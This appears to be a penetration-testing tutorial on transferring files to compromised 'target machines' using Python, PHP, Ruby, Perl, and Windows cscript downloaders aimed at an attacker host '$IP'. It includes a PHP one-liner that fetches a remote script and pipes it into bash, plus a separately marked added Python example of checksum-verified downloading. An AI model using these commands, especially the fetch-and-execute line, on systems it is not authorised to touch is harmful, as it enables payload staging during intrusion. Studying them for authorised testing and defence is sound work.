Target machines often have different programming languages installed. Linux usually includes Python, PHP, Perl, and Ruby, while Windows may have them too, but less often. On Windows, built-in tools like `cscript` and `mshta` can run JavaScript or VBScript code.
Python
Python is a high-level, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation.
```bash
# Download a file (Python 2)
python2.7 -c 'import urllib;urllib.urlretrieve("http://$IP/test.txt", "test.txt")'

# Download a file (Python 3)
python3 -c 'import urllib.request;urllib.request.urlretrieve("http://$IP/test.txt", "test.txt")'
```
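The one-liners above write whatever the server returns straight to disk with no check that the transfer was complete or unmodified. The following is an added example, not code from the original page: it downloads with `urllib.request` in chunks, hashes the stream as it is written, and refuses to keep the file unless the SHA-256 digest matches the expected value. To run offline it serves a constructed `test.txt` from a throwaway `http.server` on `127.0.0.1`; the hostname, port, file content and digest are all assumptions of this example.

```python
"""Added example (not from the original page): chunked download with
urllib.request plus SHA-256 verification, served by a local http.server
so the whole thing runs offline."""
import hashlib
import http.server
import os
import tempfile
import threading
import urllib.request

# Constructed sample payload standing in for test.txt on the transfer host.
SAMPLE_CONTENT = b"hello from the transfer host\n"
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_CONTENT).hexdigest()


class _Handler(http.server.BaseHTTPRequestHandler):
    """Minimal handler that serves SAMPLE_CONTENT at /test.txt only."""

    def do_GET(self):
        if self.path != "/test.txt":
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Length", str(len(SAMPLE_CONTENT)))
        self.end_headers()
        self.wfile.write(SAMPLE_CONTENT)

    def log_message(self, *args):  # keep the example quiet
        pass


def serve_sample():
    """Start the throwaway server on a free loopback port; return (server, base_url)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def download_verified(url, dest, expected_sha256, chunk_size=64 * 1024):
    """Stream url to dest and return the SHA-256 hex digest of the bytes written.

    Raises ValueError when the digest differs from expected_sha256; the partial
    file is deleted so a truncated or altered transfer never lingers on disk.
    """
    digest = hashlib.sha256()
    with urllib.request.urlopen(url, timeout=10) as resp, open(dest, "wb") as out:
        while True:
            chunk = resp.read(chunk_size)
            if not chunk:
                break
            digest.update(chunk)
            out.write(chunk)
    actual = digest.hexdigest()
    if actual != expected_sha256:
        os.remove(dest)
        raise ValueError("checksum mismatch: expected %s, got %s" % (expected_sha256, actual))
    return actual


def demo():
    """Download the sample from the local server; return (digest, size_on_disk)."""
    server, base = serve_sample()
    try:
        with tempfile.TemporaryDirectory() as tmp:
            dest = os.path.join(tmp, "test.txt")
            digest = download_verified(base + "/test.txt", dest, SAMPLE_SHA256)
            return digest, os.path.getsize(dest)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

In practice the expected digest comes from wherever the file was staged, out of band; the point of computing it over the stream rather than re-reading the file is that the check covers exactly the bytes that were written.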
PHP
PHP is a general-purpose scripting language geared towards web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995.
```bash
# Download a file
php -r '$file = file_get_contents("http://$IP/test.txt"); file_put_contents("test.txt",$file);'

# Download a file using the fopen() function, copying it in 1024-byte chunks
php -r 'const BUFFER = 1024; $fremote = fopen("http://$IP/test.txt", "rb"); $flocal = fopen("test.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Download a file in memory and pipe its lines straight into bash (nothing is written to disk)
php -r '$lines = @file("http://$IP/test.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
```
Ruby
Ruby is an interpreted, high-level, general-purpose programming language. It was designed with an emphasis on programming productivity and simplicity.

```bash
# Download a file
ruby -e 'require "net/http"; File.write("test.txt", Net::HTTP.get(URI.parse("http://$IP/test.sh")))'
```
Perl
Perl is a high-level, general-purpose, interpreted, dynamic programming language. Though Perl is not officially an acronym, there are various backronyms in use, including “Practical Extraction and Reporting Language”.
```bash
# Download a file
perl -e 'use LWP::Simple; getstore("http://$IP/test.sh", "test.txt");'
```
JavaScript
The JavaScript code below lets us download a file. We'll save it in a file called `wget.js` with the following content:

```javascript
// Issue a synchronous GET for the URL passed as the first argument
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();

// Write the raw response body to the path passed as the second argument
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```
Run this command in Command Prompt or PowerShell to execute the JavaScript and download a file.
```bash
cscript.exe /nologo wget.js http://$IP/test.txt test.txt
```
VBScript
The VBScript code below lets us download a file. We'll save it in a file called `wget.vbs` with the following content:

```vbscript
' Issue a synchronous GET for the URL passed as the first argument
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

' Write the raw response body to the path passed as the second argument
with bStrm
    .type = 1                                ' adTypeBinary
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2 ' adSaveCreateOverWrite
end with
```
Run this command in Command Prompt or PowerShell to execute the VBScript and download a file.
```bash
cscript.exe /nologo wget.vbs http://$IP/test.txt test.txt
```